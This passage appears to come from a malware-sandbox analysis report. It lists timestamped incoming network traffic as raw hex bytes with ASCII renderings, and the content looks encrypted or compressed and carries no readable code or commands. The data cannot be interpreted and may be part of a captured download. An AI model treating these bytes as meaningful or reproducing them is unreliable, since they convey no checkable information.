2021-12-14 11:52:59 UTC	27	IN	Data Raw: 3e e8 72 b0 eb b4 c9 02 d6 61 c8 31 61 23 3f 3a 6c c9 6b 79 93 0e 1e 6a af 7e fb 83 d5 19 f5 96 02 5a f7 a8 5e dd f6 82 84 cc 62 2e 60 d8 93 c8 96 39 8b 78 56 6f 87 bc 90 f1 c7 02 90 00 40 e5 a0 a7 38 64 bd 93 a9 3e 86 f4 db 93 09 38 47 4d c3 ca f0 91 7d cc 16 26 19 49 d2 ca 85 a1 85 ec 12 19 13 06 0f 9b 69 1a b5 64 06 97 4e 86 a0 5b 84 f6 2a f4 1e 9e 6e 52 ba 2d ac 8d 3c 74 93 6f 56 56 4d 4f 1a ce cb 8b ad c2 11 c7 32 46 73 14 0b 62 6a 73 b5 16 52 39 a1 45 b1 89 c3 1d bc 35 26 d6 82 ab 4f 9a 56 94 95 2e 53 b0 82 6c 6c 9d de c7 98 71 32 1e 50 d5 04 7e f2 ec a2 62 aa 45 80 2e f7 4b 3b d1 6d 04 b1 1d 92 bb de 3c ea 1c e1 23 73 47 a0 ca 91 63 9c ef 85 c6 ba d4 69 96 ff e4 17 15 f3 06 79 5c 7e 16 1b b2 0e 9a c1 80 4f 67 5a e8 e7 86 67 cd 6d 70 d7 05 af fe cc Data Ascii: >ra1a#?:lkyj~Z^b.`9xVo@8d>8GM}&IidN[*nR-<toVVMO2FsbjsR9E5&OV.Sllq2P~bE.K;m<#sGciy\~OgZgmp
2021-12-14 11:52:59 UTC	28	IN	Data Raw: ac 1b 1b d8 de f1 03 49 dd 6c 4b 00 be 7c c6 3f 68 d5 6c 93 e7 b1 bd ca 3d 89 55 35 39 29 18 1a 04 dc 23 a7 5e d3 de b2 95 3d 18 ac 6f f1 02 e2 b6 3d 76 08 ee 9e b2 07 a1 49 82 a3 7a d6 30 f1 b7 a4 c2 b5 b4 dd ad 0a c0 c1 d5 53 88 9c 6a 2b 42 21 f3 a7 40 22 d8 9a 74 b3 89 e3 fe 79 21 42 c5 3e 9f 25 82 b4 72 67 c1 76 14 a0 a9 2d a7 ee 03 5c 6c f7 1e 40 ac 43 3e 07 e4 e0 d9 ee 71 4e 1a 0a 2f 5a 49 54 78 0f 0b fb 00 32 93 e8 1d d1 fa 1d dc cd fb 4e 51 ef 8c 82 40 85 8a 29 25 2d 1d 4e cc 22 55 9a 87 0b de b0 0b 1d f5 b7 50 a5 6d fd a7 04 96 77 57 ff ce 40 47 47 8b 35 be 82 5b 36 5a 4c 1d e3 ec 13 54 b1 7a 5a bd b0 3e 06 af d4 eb 10 19 ee 00 e9 86 a2 a2 87 ea 4d 6d 93 21 a1 17 93 58 d0 95 ea b0 88 97 79 be 14 f4 1f fd bb c2 3a 1d c8 fa bc 26 6e af e0 fa df 47 Data Ascii: IlK\|?hl=U59)#^=o=vIz0Sj+B!@"ty!B>%rgv-\l@C>qN/ZITx2NQ@)%-N"UPmwW@GG5[6ZLTzZ>Mm!Xy:&nG
2021-12-14 11:52:59 UTC	29	IN	Data Raw: 5d 1b dc 71 05 5a 67 02 f1 41 2f 51 b0 f2 e1 ea a7 e6 a4 7c 2f 2b 2d ca cf c7 7a 06 c1 3f e9 04 9e 79 6f 99 7a 8f ec 01 2b d1 76 35 eb ef af 79 41 a8 b3 5a 80 e0 f1 8e 0b 02 0c 57 06 fd 3a c4 5d 32 e9 78 a3 e0 af 1b 1b c7 b7 db 2f 76 1e 37 03 6f a7 3c 73 80 0d d3 5d 55 a8 e8 8c df 28 f9 d8 15 5b b7 73 4d db e7 84 be 13 f1 21 48 8c 54 c8 9c 3b e9 5e 46 69 e2 ba b3 ef 40 3a 98 11 4e e7 85 6e 33 e6 94 82 a6 17 82 d1 ca 9c 1c 31 59 74 03 c7 d7 8a 6d c3 34 20 1d 5f c9 e5 82 b1 87 12 18 17 11 1d 11 91 6f 3f da 44 14 86 55 98 98 9c b4 96 10 e4 09 4e 68 a6 20 69 80 8c 3d 6d 92 4f 5e 36 71 5e 0c d5 cb 81 db ed 10 cd 29 58 66 13 cc 75 eb c6 cb 36 7b 2e aa 56 9e 85 8d 81 98 2f 37 d9 47 5c 4d b0 4b ad 8b 27 52 ae c2 4e 79 8d d1 d7 3d 4a 3c 1c 4b c9 0a 78 d5 fd 89 00 Data Ascii: ]qZgA/Q\|/+-z?yoz+v5yAZW:]2x/v7o<s]U([sM!HT;^Fi@:Nn31Ytm4 _o?DUNh i=mO^6q^)Xfu6{.V/7G\MK'RNy=J<Kx
2021-12-14 11:52:59 UTC	31	IN	Data Raw: f5 52 6d 02 ff f9 5a 67 aa d4 0b 0c 37 4d 31 92 66 20 0b af 69 40 80 0e e1 f8 6a 6f a8 d5 89 5d cf f4 59 7b 95 8f 32 40 2d 52 0e 38 f7 46 d8 7e 0f 24 9c 1f 59 a3 9f 7b 97 9d 68 73 29 13 c1 fe 26 ae 20 02 c2 6a ce 03 49 ea ce 5a 1a bb 7a fc 13 7c c9 60 e0 c9 9d bf d3 22 85 4c 21 d1 3f a8 0f 10 c1 2c 37 4f d7 d0 5b 08 00 16 a2 75 6d 1b f7 52 2a c6 1b c9 8b b1 78 a3 4b 06 32 77 db 0b a7 b7 b5 cb 81 51 ec 88 07 a4 cc cd c3 86 1a 97 c5 be 16 c9 b5 4f 28 de 18 34 bc 77 e3 c1 7e 21 44 cb d0 92 44 7c 41 10 69 db 0a 2e a1 b8 28 a9 14 2a 64 60 e6 1f 54 59 f3 2f 07 ee f9 d7 d8 76 40 1a 11 31 41 3d 32 79 23 2a ea 2e 10 94 fc 3f 59 d0 81 da db 7c 58 57 ed a5 d5 55 91 a8 88 0d 6e 16 56 4a 0c 5d b2 22 23 e8 bb 78 63 e3 3b 69 af 72 e0 9c be 96 66 52 c8 87 be 46 74 07 e3 Data Ascii: RmZg7M1f i@jo]Y{2@-R8F~$Y{hs)& jIZz\|`"L!?,7O[umRxK2wQO(4w~!DD\|Ai.(d`TY/v@1A=2y#*.?Y\|XWUnVJ]"#xc;irfRFt
2021-12-14 11:52:59 UTC	32	IN	Data Raw: c8 19 a1 00 b9 2c 81 6e 29 48 c1 1e 8c 23 9f 78 b2 ed c0 56 5d 9b 66 40 8a ec 7c 33 c2 6a 63 df 12 af b7 92 45 47 2f 94 33 b5 1d f5 84 6e 40 09 45 f2 ab c0 04 12 0f 60 cc fa ae 6d 7b c8 40 a7 39 5e 37 dd 61 58 58 67 04 85 34 2f 58 a4 1f ff d7 bc d9 95 62 26 2c 05 94 d0 39 7d 02 e7 38 ec 48 e6 d7 3b 87 7d 9c c5 09 ca c1 7a 53 f2 ed ab 64 b7 a8 e0 51 8b f1 ef fa c8 02 20 57 da e2 77 5f 9f 35 db 5f bf ea a5 cf 0a 38 b6 f7 3c 7b 3f 30 1b 6c 36 6a 5f 82 10 02 65 bc b7 e1 72 d6 24 f8 95 10 63 8c 5d b2 24 f0 86 b5 10 73 24 02 5d 8d c5 b2 39 8c 7c 42 4c a2 be 47 a5 c8 5b 90 20 f3 e2 8c 71 38 5b bd 82 9b 16 91 f5 98 99 03 38 5e 5b 3e f6 ff 9b 74 3d 3f 1d 15 37 ef c1 94 aa ec 74 00 16 1b 1c 19 bf 7e 13 a2 90 14 aa 5d 91 b6 8d 9f ef c5 e4 25 46 6e 88 37 0e b5 73 3c Data Ascii: ,n)H#xV]f@\|3jcEG/3n@E`m{@9^7aXXg4/Xb&,9}8H;}zSdQ Ww_5_8<{?0l6j_er$c]$s$]9\|BLG[ q8[8^[>t=?7t~]%Fn7s<
2021-12-14 11:52:59 UTC	33	IN	Data Raw: 4a 4f 17 d3 b8 b1 b8 66 5a a6 dc a3 4c 24 c8 41 79 8e c8 db 1b 0a ff cb 70 1e 1b 42 d9 5c d2 f3 42 58 35 c6 85 15 eb 39 a5 1f 0d cf dc 9e 4a 6a 03 44 1a 1a c0 71 a9 66 e2 d4 71 f4 76 01 e4 19 10 01 55 cf c8 e0 02 9a 4f 3d d5 23 12 33 22 a3 ba 7a 29 18 ad 65 dc 83 80 56 2f 72 63 ae 04 88 8c 6a ce 59 7b 9e 27 25 5d 2b 49 b8 03 7c da c9 7b bb 33 80 16 4c 24 8a 42 85 85 7e f5 3d 18 e9 d1 86 bf 2d 6b 81 e7 f1 09 33 f7 6b 9d 06 72 67 3b 94 43 dd 7b 6c eb 94 a9 c9 ad 80 4a 2f 73 b4 3d 07 1f 62 a6 ad 48 d2 d2 4b bc 08 1b bb 69 f8 03 75 ff 24 80 0f a9 bf 99 df a3 4b 0c 14 18 96 43 80 26 a4 c4 95 1b 71 ad 03 3b 77 c2 89 ba bc 6a 3b 41 09 9d 12 dc 21 e5 17 2b b3 9a d2 e8 73 b9 48 d3 40 e3 24 82 af c7 e1 cb 19 2b a3 c6 bf b4 ea 21 45 64 79 a3 62 3c db 3e 07 df f8 f4 Data Ascii: JOfZL$AypB\BX59JjDqfqvUO=#3"z)eV/rcjY{'%]+I\|{3L$B~=-k3krg;C{lJ/s=bHKiu$KC&q;wj;A!+sH@$+!Edyb<>
2021-12-14 11:52:59 UTC	34	IN	Data Raw: 6f 04 5d 5f 06 f7 fe a3 b4 c9 1b e5 7d 48 62 0f f5 5c 66 71 a2 1f 52 00 a3 45 bd b2 ea 0c b3 25 58 40 54 7d 56 9e 56 ad d3 06 44 bb f6 55 60 8c d0 ce 46 73 35 34 6e d9 2c 6f f5 c4 8c 6f bb 40 f5 0e e4 44 33 d1 6a 04 79 1e 92 b7 a2 61 fb 13 f1 23 76 86 19 95 9e 61 87 f1 a5 f9 f1 d4 63 8f 95 be 18 0f 2f 04 7e 22 83 01 c1 af cb 11 c2 b0 4c 66 4f e0 eb 92 07 83 68 66 cc 6f e7 e6 cd 50 09 a7 d7 23 69 b0 4b 2a 50 d6 9f 74 03 b2 28 d7 50 3d 97 42 c4 3e 2f b2 f6 4c 06 5a b1 1c f7 ab 96 b3 5b 50 55 4c 3d 45 0e c2 69 08 bf cd d1 b5 00 d7 5c 37 1e 11 42 d0 24 13 b6 46 52 26 cd 96 13 fa 32 f8 0e 06 41 7f f1 e3 6a 01 4e 0b 0e 84 ff ad 4e bf f8 df 20 0f 48 f1 6c 21 0b 53 40 53 e7 38 cc 12 91 d5 23 19 58 1a 3b ba 70 ff 1a af 75 db 80 80 56 96 d0 64 b9 d4 b7 6b e4 e5 5f Data Ascii: o]_}Hb\fqRE%X@T}VVDU`Fs54n,oo@D3jya#vac/~"LfOhfoP#iK*Pt(P=B>/LZ[PUL=Ei\7B$FR&2AjNN Hl!S@S8#X;puVdk_
2021-12-14 11:52:59 UTC	35	IN	Data Raw: 10 dc 39 76 50 cc 78 05 2b e8 06 23 94 e0 35 50 fa 1d 9c db 6c 29 51 e1 8d 96 54 91 a0 8a 2b 2d 75 26 40 17 55 9a 86 23 f3 81 0f 17 98 3b 6f a5 20 fc 8f a0 82 7c 2e b3 95 40 4d 41 ef 86 32 a9 51 3b 59 24 52 f2 ea 03 6f ae 0a 73 ba a8 b9 12 aa c5 ef 12 14 90 21 fe 97 af 11 93 f9 35 57 1e 1e ab 06 97 e2 ae b3 f8 bc 93 98 45 c3 0d 79 3a ee bf d2 2c 7f f7 f6 aa 3b e1 b9 fc ea d8 df 2a da ed cf 8d 97 49 78 20 20 26 df ed 03 92 05 be ce 78 3a 3c 02 4c c4 eb 3a 55 bb 1e 8c 92 0e 6f 63 8a 46 88 4c 50 91 9d 80 8e 72 61 9d e5 b3 36 bc a1 9e d5 91 ad 20 e2 40 15 96 10 d1 d4 c3 d3 33 88 ed 2d 07 fa 26 92 35 5f e7 b6 67 62 19 e8 98 69 5b 16 46 29 1e de 14 c1 14 ae ce 02 55 0d e6 4b ab 6c 08 ef e8 12 84 27 70 48 a0 dd ce 39 62 9b 66 4a a7 c9 7d 22 de 74 5d 2c 3b ae b7 Data Ascii: 9vPx+#5Pl)QT+-u&@U#;o \|.@MA2Q;Y$Ros!5WEy:,;*Ix &x:<L:UocFLPra6 @3-&5_gbi[F)UKl'pH9bfJ}"t],;
2021-12-14 11:52:59 UTC	37	IN	Data Raw: ff d8 3c 2b 6b bb 91 a0 09 9c e6 dc 99 12 2e 57 5d eb d8 d3 85 64 e3 3f 30 18 49 f0 d2 95 ae 95 12 75 17 11 1d 2d 69 61 10 a6 69 15 97 58 91 44 8c bb f3 38 f3 49 91 79 84 37 1f bf 8a 3d 76 84 71 b9 58 70 56 72 93 da a3 b0 ce 0c de 24 49 73 02 c4 8f 64 5d a1 1d 76 34 b3 42 bb 8b ca 1b 4d 2e 1b db 4c 6e 5b 95 45 82 80 f8 45 9d 97 6e 40 8c d0 dd 4e 4a 2e 1d 41 d0 04 1d f2 ec a2 42 7e 51 89 ff e4 55 3e df 6b d2 a7 30 9b 89 b3 31 fb 13 e4 38 6d 96 76 c8 99 7a 73 e1 81 c9 b3 f4 67 84 fa f5 30 1c 24 15 7c 65 0f 00 c1 af e1 74 15 7f b0 7a 5a eb e5 86 6f c2 97 67 ea 37 8e e2 ca d6 0a b3 fc 68 17 d2 25 e8 5a fe e2 5d 9f b8 0d f0 46 17 97 40 e8 22 51 2c 41 23 ad 2b a1 16 ff b8 89 b8 4c 44 22 75 5c 44 0a 4c 2e c8 be cd dd b9 03 ec cc 37 0f 1c 45 24 4a a7 b5 51 4b 32 Data Ascii: <+k.W]d?0Iu-iaiXD8Iy7=vqXpVr$Isd]v4BM.Ln[EEn@NJ.AB~QU>k018mvzsg0$\|etzZog7h%Z]F@"Q,A#+LD"u\DL.7E$JQK2
2021-12-14 11:52:59 UTC	38	IN	Data Raw: 80 09 a4 c4 95 c0 d0 a5 0a bf c6 fd 6c bc 9c 6c 44 21 09 c0 a2 68 68 cc 17 2d 9b 37 e2 ed 79 5f 75 d2 40 a1 22 aa ff ec 76 cd 67 41 a1 a9 23 9c a8 28 48 6b df aa 42 c3 d1 51 3a ef f3 d6 c0 4d d2 18 00 38 20 46 cc 78 0b 29 76 04 23 93 d4 8b 50 f8 17 b5 e6 77 49 5b e9 a5 09 56 91 a4 f4 45 2d 17 52 68 bd 57 9a 80 0b 56 b1 0b 1d 8d 06 6e a5 67 fa a7 f2 95 77 5b a9 f4 40 47 49 b4 49 31 a9 5d 1e e5 5f 1a f8 85 3a 7d a8 73 5c 93 0b b1 01 a9 aa 8a 03 12 fb 23 5b 95 a5 06 be 5f 5a 7b 15 71 9c 16 92 f0 c7 f1 78 bd 99 91 02 28 0d 79 3a ee bc e8 4a 02 de df 29 30 f2 b4 e1 eb c1 b4 1c ca e9 4b 37 f1 4e 56 20 2a 27 2c f5 39 de 63 f1 7c 78 30 33 7e 20 d4 ef be 3e 73 25 bf af 0c 75 05 cb 55 80 6d a5 88 93 fe 9c e9 72 91 de b5 31 95 99 9e d5 99 be 1b f3 5f 65 a7 1e d1 de Data Ascii: llD!hh-7y_u@"vgA#(HkBQ:M8 Fx)v#PwI[VE-RhWVngw[@GII1]_:}s\#[_Z{qx(y:J)0K7NV *',9c\|x03~ >s%uUmr1_e
2021-12-14 11:52:59 UTC	39	IN	Data Raw: cc a8 61 eb 78 a5 cf 81 c6 1d cc 9f 4e 3e 63 38 5f 9a 7b c8 61 1c 09 06 0f 6f a6 ac c3 a3 c6 0c 95 7c 15 5b fd d6 e3 db e7 8c 92 1c 73 29 27 46 93 c8 96 2c f5 fc 46 69 e2 c6 1d f0 cd 1b b0 0f 4c f4 a0 59 0c 6b bf 88 c9 da 91 f5 d1 88 07 46 8f 57 15 d3 d2 5b b2 ee 2f 35 6d 72 d8 c1 95 82 93 2b 05 63 2a 17 00 b2 11 4c b5 6e 1f 5a 81 9c 9f a5 a0 f9 3b ef 04 52 f4 91 37 06 ad 86 15 5f 83 6d 4d 87 5b 59 63 0c da a3 be e9 16 e7 23 49 63 19 dd 71 67 71 a2 19 18 46 a0 53 bb 9a cd 0c b3 2f 31 d8 2e fd 5c 80 4e 85 9a 07 57 81 81 66 3a 8d d1 dd 19 62 3d 0d 57 c9 29 51 b5 ed a8 6f bb 5b 9f e7 e8 ba 38 ec 6a 25 b1 ca 9f ae c0 22 fe 13 ea 37 61 9e 88 d8 b2 6a 9b 6d b8 d1 bb d5 49 9a ea e6 1d 0f 34 10 61 b3 7a 2d c2 bd cb 12 ea 91 4a 79 40 12 e4 bb 61 cd 6d 6f 5c 0c 98 Data Ascii: axN>c8_{ao\|[s)'F,FiLYkFW[/5mr+c*LnZ;R7_mM[Yc#IcqgqFS/1.\NWf:b=W)Qo[8j%"7ajmI4az-Jy@amo\
2021-12-14 11:52:59 UTC	40	IN	Data Raw: ee 81 ab 3d 30 4d e7 f1 09 42 35 7f 6e 39 9f 70 ed 13 7b db 6f 66 ce a5 bf d2 3b 57 5f 39 ed 2f 1e 1e 1c d6 3b 83 5e db c8 4c ce 11 00 cf 63 ff 10 fb 48 3d 58 0a f1 9c c0 52 a3 5d 0c 14 68 d6 18 a8 67 a4 c8 43 af fc be 0a b5 c1 ce 63 b8 9c 84 3a 41 09 9a a6 40 39 d0 1b a6 98 89 e2 ec 60 38 59 db 56 bd b8 93 b6 f8 60 57 08 29 b9 bf bb a5 e2 32 5e f1 e6 1c 58 d5 47 2f 0f f5 e5 40 d7 6d 53 0c 9c 2f 56 3b da e4 1e 09 f6 10 bf 84 f4 2a 59 ee 81 cb d3 69 43 47 73 9c 9e 4b 9a b4 16 34 25 1c 54 59 1a 43 85 8a 0b f1 b0 0b 1d e0 b5 d8 ba 7d 26 98 67 1b 5c 5d d7 95 4c 45 52 93 eb 25 ab d5 81 44 50 c0 da f3 06 7c a2 0a cd ba a8 b5 12 a9 cb fa 8e 39 ff 0b fe 84 a0 08 18 56 4b 7e 91 a9 7b 00 48 ed 17 13 d2 bc 99 9a 60 a2 04 f7 87 e2 ab 19 38 15 cf e8 ba 19 eb bf ed e7 Data Ascii: =0MB5n9p{of;W_9/;^LcH=XR]hgCc:A@9`8YV`W)2^XG/@mS/V;*YiCGsK4%TYC}&g\]LER%DP\|9VK~{H`8
2021-12-14 11:52:59 UTC	42	IN	Data Raw: 95 de 5d 1b dc 36 ed 58 67 0e 40 37 0a 79 8d e1 fe f1 b4 e6 87 7d 2f 2b db 9d cb ed 7d 32 ef 3d e9 02 f7 01 73 bb 70 92 d6 10 34 c1 56 5a c7 ee b3 3f 6d aa ae 4b 86 f0 fd d1 3e 03 41 58 d8 e7 62 ce 80 2e 9b c2 a3 e7 af cc 1b ee 73 db 3e 65 5d f6 12 7a c2 43 e5 81 07 05 0a 22 a9 e8 86 c4 0d eb bb 01 73 9a a1 4d dd f1 00 99 1a 71 20 5c d8 86 e0 3f 3b 9a 7d 6f 78 e8 a9 9b fc dc 14 8c 39 21 f7 a6 77 3d e6 b8 82 a6 17 85 e1 cf b1 a0 29 48 5d 3d c8 ff 93 66 d0 3a 38 04 c5 e7 c1 94 af 89 12 99 17 11 1d 2c ad 6f 1f ad e2 2a 86 5f 88 ac a5 0f f8 3b ef 25 4a a9 cd 37 06 ae a5 29 67 83 67 54 5e 77 53 dc 95 da a3 b6 eb 05 cd 23 43 71 02 cb 62 6d 0f d1 18 7a 24 b3 4c ad 88 c5 1e ba 07 54 d8 54 7b d0 aa 54 85 9b 15 42 a0 84 4e 3a 8c d1 d7 58 4c 3a 1a 4a 07 bc 6d f3 ec Data Ascii: ]6Xg@7y}/+}2=sp4VZ?mK>AXb.s>e]zC"sMq \?;}ox9!w=)H]=f:8,o*_;%J7)ggT^wS#Cqbmz$LTT{TBN:XL:Jm
2021-12-14 11:52:59 UTC	43	IN	Data Raw: 3b 18 0b 55 52 5e fa 08 c9 43 c5 fd 21 18 31 5c 1a ab 5f 4c 2f ab 72 cb 96 2f f0 ee 16 42 bb de 99 4b c6 cd dc 78 9f 2b 4c 61 38 4d 30 b2 d9 67 b7 67 ac 35 9d d9 47 8f 15 5d 9c 84 74 ec 31 3b f9 ff 84 b5 f5 18 c9 f5 e6 d5 5a f8 7d 58 00 83 4e 98 e4 97 22 6a 66 f1 4b ac d9 20 82 4c 07 f9 a9 c8 e1 e3 08 35 8e 76 ec c8 4c 9e 02 32 93 5b f1 0a f1 96 3c 5c 20 c2 b6 99 df a3 0a 38 14 68 d6 18 a8 b7 3a c6 9f af 80 a6 0a b5 cb d0 53 bf 93 6a 3a 41 13 c0 a6 41 28 cf 17 2b a2 89 e2 ed 5a 35 48 d3 7a ae 24 82 b1 ef 76 cb 03 21 a1 a8 34 84 ed 2b 58 6e f7 14 22 c3 db 2f 11 fd f9 e4 c6 66 4f 1a 00 2f 54 39 d8 86 0e 2d f9 00 0b 33 fd 35 5a 74 22 da db 77 5a 54 f0 98 85 5e 91 b3 80 3a 26 e9 57 6c 0c 53 b2 21 22 e8 bb 87 3c e2 3b 6e b6 68 e3 83 a2 9c 77 4c dd 8b 59 b9 4c Data Ascii: ;UR^C!1\_L/r/BKx+La8M0gg5G]t1;Z}XN"jfK L5vL2[<\ 8h:Sj:AA(+Z5Hz$v!4+Xn"/fO/T9-35Zt"wZT^:&WlS!"<;nhwLYL
2021-12-14 11:52:59 UTC	44	IN	Data Raw: eb ca cf 02 3d 01 95 3f b5 70 2a 59 e1 1a 86 0b 5d 51 a1 db ec e8 fa 9b 6c 4b e0 c2 7e 22 d2 6b 5c 77 8e af b7 98 64 d1 d2 95 19 aa 32 61 fd 6e 4a 1a 5e e9 b8 cc 37 c6 1f 4a d9 e9 3f 79 7f e0 c2 be c7 59 74 47 59 2b 52 4b 15 97 11 a3 52 ba e7 91 04 b9 ce b5 50 2b 28 09 b6 c3 d6 79 39 39 2e ec 13 f4 10 69 17 c7 ae 02 18 1c 81 55 5a f1 c6 22 70 6d a2 9c fe 86 f1 e0 eb e8 16 29 75 ef e7 3d c4 93 3b 9b c2 a3 e7 af cc 35 fe b7 db 34 bd 32 36 38 7b d8 6b 73 80 07 0f 65 c0 dd e8 99 cd 08 fa bf 0e 6b f3 a2 c4 da e7 8d fd 1a 71 30 57 d0 ba 73 9c 3b 90 5f c9 6a e8 af b9 d5 cd 11 92 1c 46 dc 1f 71 2b 6d b4 f1 1c 16 91 ff d1 9e 6c fa 48 57 1f ca f0 85 7f cd 06 7c 19 49 d8 d0 9b bf 91 a0 12 12 00 13 28 82 7e 1b bf 43 10 be 6d 88 ba 8d 86 fd 48 68 08 44 7f 97 30 d8 be Data Ascii: =?p*Y]QlK~"k\wd2anJ^7J?yYtGY+RKRP+(y99.iUZ"pm)u=;54268{ksekq0Ws;_jFq+mlHW\|I(~CmHhD0
2021-12-14 11:52:59 UTC	45	IN	Data Raw: 2a 87 cf b2 16 f9 d5 1d bc 5e 47 74 26 64 00 0f c8 41 7b bb e5 55 a7 0a f5 a4 a6 1f 1b 59 b5 c4 8a b6 4c 70 83 c6 87 13 f8 3e 90 8c 0d cf c2 8d 4c 14 92 44 1a 10 f8 32 d3 dd b5 d5 7b ed 11 4f f4 10 75 83 52 41 79 fc f3 cb 74 b9 d9 1b e3 37 4d 3b ab 73 32 07 81 e4 ce 87 08 8e 73 78 64 bf f6 08 59 e7 e3 4f 53 b1 2d 23 41 2c 0d e0 b4 c8 46 c9 76 bc 39 bf 9f 4b aa 3b 05 16 85 7e f9 05 15 d0 f6 95 b3 03 81 db e6 f7 6c c3 ea 6c 4d 02 a2 61 e4 08 64 f5 e1 6e e6 9b d0 58 30 89 5b 05 7f 28 34 18 0f de 2b a3 4a 25 c9 5d 9c 6f 89 bb 63 fb 1c d3 66 3c 5a 00 d3 62 98 bf 8f 6e 1d 13 44 f7 30 e2 b6 a4 ce 8e a6 fc a8 22 d6 c3 d5 55 d0 16 6b 3a 47 66 58 a6 40 22 de 10 03 04 89 e2 eb 60 38 59 d5 68 39 25 82 b4 c2 35 da 13 09 33 a8 27 be c7 11 59 65 db 22 31 e1 d9 3e 01 fd Data Ascii: *^Gt&dA{UYLp>LD2{OuRAyt7M;s2sxdYOS-#A,Fv9K;~llMadnX0[(4+J%]ocf<ZbnD0"Uk:GfX@"`8Yh9%53'Ye"1>
2021-12-14 11:52:59 UTC	47	IN	Data Raw: 9b 6e 3c 20 bd 08 60 1f d1 54 84 6e a2 9b 9a e9 87 7e 73 9a de b5 27 bb d2 99 d4 93 a7 0c e0 72 8a 96 1e d7 d9 e3 27 30 88 e3 5e 58 93 26 92 26 58 cf 12 7f 52 1b fb 12 7b 56 3e ad 2a 1e c9 13 c6 75 c6 e7 2c 5d 01 93 3d a1 7e 09 f3 e6 0b 8b 4c 18 53 a1 d7 d6 54 d2 5c 66 40 ce ff 74 24 fc 30 59 5f 14 c0 9f 90 4c 5d d7 84 18 d2 c8 cc fc 64 2f 2d 5a ff ad cf 34 7b 0e 4c c2 fd a3 1b a4 c8 49 b7 ef 36 1a da 53 44 42 66 04 94 56 09 53 ba e7 f8 d3 1e cd bf 7b 40 0b 07 9d cb c1 77 f0 fa 18 c1 35 f1 01 65 8a 79 ef ee 12 34 c6 5d 72 cf ee af 79 b3 a4 b3 61 87 e1 e6 e1 36 03 0a 5d 2b 1e 3d db 9a 3f e8 79 b8 d7 a6 c6 41 c6 b7 db 60 63 32 21 61 c0 c8 6b 79 8a 01 71 49 b4 a8 ec a4 c0 0a fa b8 3d 08 f4 a2 4b f3 ff 8f 9e 1c 1e e7 48 cc 98 16 92 1e b2 40 47 69 e2 a5 b9 c9 Data Ascii: n< `Tn~s'r'0^X&&XR{V>*u,]=~LST\f@t$0Y_L]d/-Z4{LI6SDBfVS{@w5ey4]rya6]+=?yA`c2!akyqI=KH@Gi
2021-12-14 11:52:59 UTC	48	IN	Data Raw: d3 e3 ad d7 93 4f 63 85 f0 dd 84 0f 25 1f 5e d8 7b 01 cb ca 60 16 ea 8a 20 ec 48 ec ef 80 07 57 68 66 cc 6f 0b e6 cd 50 09 b6 f4 7b 7d 8c bf e8 50 dc bd f6 9c b2 2e f5 d8 31 86 4e eb b4 28 3c 4b 28 a8 72 80 16 ff b0 a3 6b 5e 41 59 24 2f c9 0f c8 47 79 b8 13 cf 83 22 c8 cb 37 14 08 54 dc 46 a3 8e 46 58 3f 1b a1 17 eb 39 ff 19 25 64 cb 9e 4c 05 86 45 1a 1c c6 3a ab 64 a3 c4 77 91 91 58 e5 1f 0d d1 40 57 6c e3 11 54 67 aa d5 32 1e 26 45 2c d5 f3 22 0b af 61 c4 96 08 f0 f1 63 0b 30 df 9f 5c f4 ee 48 7d 8e 25 3a 24 b3 4c 36 b2 db 4c c9 76 85 a7 96 07 42 87 75 7b 97 ac ec fe 16 19 ec c0 95 b5 03 8a d9 e6 fb 2e 7f 98 4e 49 11 ae 63 e1 08 64 cc 72 02 ce 9f bf d4 20 85 4c 26 a8 0c 36 1e 1a c7 36 ba 54 b4 ee 4e 94 17 0b b7 4b 5d 09 fb 4e 53 70 08 c5 9a 9f ce af 24 Data Ascii: Oc%^{` HWhfoP{}P.1N(<K(rk^AY$/Gy"7TFFX?9%dLE:dwX@WlTg2&E,"ac0\H}%:$L6LvBu{.NIcdr L&66TNK]NSp$
2021-12-14 11:52:59 UTC	49	IN	Data Raw: 91 b4 10 f9 25 5b 7b 15 0f b0 3f fb fb c1 94 e8 ae b1 4e 6d aa 0a 51 e0 ff bb c5 01 3e db f7 ac 5e 8a be ed e7 a6 fd 3e cb ef 53 2d d0 a3 78 20 20 17 70 08 ed 68 b4 d7 dd 6f ce 23 71 24 c5 f0 5f de 65 14 8f 62 19 69 1b 0b 55 87 57 83 88 8c d1 d4 8c 9e 68 c9 dc f0 bc bd 94 ba 54 ac 1e e8 49 55 bd 40 c3 cc eb 1b 30 88 e9 3e 4e 83 35 f7 10 5d e7 b0 13 9b 1d e8 15 7e 6a 50 78 0b 1c cf 06 d9 73 db db 13 4c 6e b2 2c aa 6a 6d ca e3 1a 8a 32 0b 43 b2 b2 e7 54 fa 9d 09 64 ca ec 7a 33 c0 76 48 30 37 ad b7 94 23 7d d3 95 19 ac 0e e4 40 6d 40 0f 37 d5 a9 c9 1a fd 0a 5d dc 83 bd 75 76 c2 5b a5 ef 96 1a da 53 06 c1 b9 0a 8c 21 d1 47 a4 e1 fe e0 d6 99 bf 7d 25 fd 14 99 e7 c7 7c 2f c7 3d e9 00 f1 fd 6f 34 d9 9d c2 10 34 c0 56 58 f7 37 ae d0 11 a6 ba 4b 86 f1 e6 e3 36 9a Data Ascii: %[{?NmQ>^>S-x pho#q$_ebiUWhTIU@0>N5]~jPxsLn,jm2CTdz3vH07#}@m@7]uv[S!G}%\|/=o44VX7K6
2021-12-14 11:52:59 UTC	50	IN	Data Raw: d4 18 ae a0 29 c3 9f af ec a8 02 a3 c5 59 6c bf 9c 6b 98 49 04 c9 b2 54 3f 42 38 2b b3 88 f1 e9 62 34 5e c4 dc ba 20 aa 1d ef 76 c1 08 25 b7 39 0b 91 e3 3d d2 45 e6 14 42 c9 0b 01 07 ee f2 f4 d2 65 4f 10 28 09 5f 26 c6 01 30 01 e8 07 52 aa fc 35 51 06 16 d9 db 02 5b 51 ef 96 bc 54 91 a2 91 15 2e 17 0a 40 1d 55 c4 86 23 f9 c2 b1 17 e2 31 65 a3 13 d7 8e b1 92 5f 4a d5 94 46 6f 1c 9f e3 35 81 43 34 5b 59 75 34 ea 07 76 76 77 7f 93 9f b3 01 a5 d8 c2 3b 12 ff 01 21 97 a3 7e bd e0 5a 7f 37 09 a3 17 94 d2 90 9d f9 ba b1 82 6f aa 0a 16 f6 fd bb c9 f7 1e fc df 9d 31 f2 b4 e0 c5 f1 db 3c c1 37 41 3c d2 67 65 20 2a 2d 01 f1 12 8b 48 d9 c1 62 30 35 6c 24 c5 db 30 95 29 14 8b a4 08 66 0d c6 76 81 46 68 9b 9a ef f8 73 61 86 bc 09 36 bd b7 94 ab 00 ad 1e e8 56 33 05 1e Data Ascii: )YlkIT?B8+b4^ 